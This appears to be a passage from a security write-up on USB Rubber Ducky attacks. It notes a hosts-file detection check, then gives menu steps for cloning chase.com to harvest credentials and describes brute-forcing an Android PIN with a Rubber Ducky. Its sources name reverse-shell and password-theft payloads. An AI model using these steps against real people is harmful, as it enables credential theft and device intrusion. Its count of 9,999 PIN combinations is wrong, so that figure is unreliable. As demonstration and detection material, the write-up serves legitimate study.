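Two things the run shows: the echo-style line for www.chase.com is reported as a high-severity override, and the two lines built from $redirectedSite = "www.chase.com/login" are reported as malformed, because a hosts entry carries a host name only and a resolver will never match a name containing a path. A scheduled comparison of this output against a known-good copy of the file is a cheap detection for the hosts-file variant of the attack.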
Choose option 1: Social Engineering Attacks. Then select option 2. The attacker wants to exploit the victim's browser. Then select option 3 for Credential Harvester Attack. Now the attacker will choose to clone chase.com.

In the screenshot above www.chase.com was entered and cloned. The IP address 10.255.169.6 will be the attacker's LHOST or external host IP. The only step left is to start the Apache server. Once the victim attempts to go to www.chase.com, they will be redirected to a cloned Chase website at 10.255.169.6, and the credentials logged.

The final attack was performed on a Samsung Galaxy S4, running a fully updated version of Android. The point of this attack was to brute force a 4 digit PIN. These will be all combinations from 0000 to 9999. That is nine thousand nine hundred and ninety nine possible PIN combinations. Even Android and iPhones will read USB devices as keyboards. The Rubber Ducky thankfully came with an adapter. The male side of the Ducky plugs directly into a type-A female connector, and that is converted on the end to a micro-USB male connector. This plugs directly into the charging port of the Samsung Galaxy S4. It should be noted that after five failed PIN attempts on an Android, the Android device will lock for 30 seconds. Analyzing [...] When testing on the Android the PIN was set to 0009, for time saving sake, and it did work flawlessly. Whether utilizing [...]
Sources

1. http://msdn.microsoft.com/en-us/library/windows/hardware/ff538930(v=vs.85).aspx
2. https://srlabs.de/blog/wp-content/uploads/2014/07/SRLabs-BadUSB-BlackHat-v1.pdf
3. http://www.ironkey.com/en-US/solutions/protect-against-badusb.html
4. https://code.google.com/p/ducky-decode/
5. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---fork-bomb
6. http://www.ducktoolkit.com/ScriptSelection.jsp
7. https://forums.hak5.org/index.php?/topic/30179-payload-duck-slurp-v2-silent/
8. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---retrieve-sam-and-system-from-a-live-file-system
9. http://nmap.org/ncat/guide/
10. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---netcat-FTP-download-and-reverse-shell
11. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---powershell-wget---execute
12. http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html
13. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---download-mimikatz%2C-grab-passwords-and-email-them-via-gmail
14. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---local-dns-poisoning